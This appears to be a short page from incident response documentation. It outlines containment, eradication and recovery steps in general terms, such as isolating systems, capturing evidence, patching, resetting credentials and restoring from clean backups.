Containment, Eradication, and Recovery

  • Containment:

    • Isolate affected systems (e.g., network segmentation, account lockdown).

    • Capture evidence (e.g., memory dumps, logs).

  • Eradication:

    • Remove malware, unauthorized access, and vulnerabilities.

    • Apply patches, reset credentials, disable compromised accounts.

  • Recovery:

    • Restore systems from clean backups.

    • Validate system integrity and functionality.

    • Resume normal operations.

Incident Management template in Linear

Incident Management template

PreviousDetailed ProceduresNextCommunication Plan

Last updated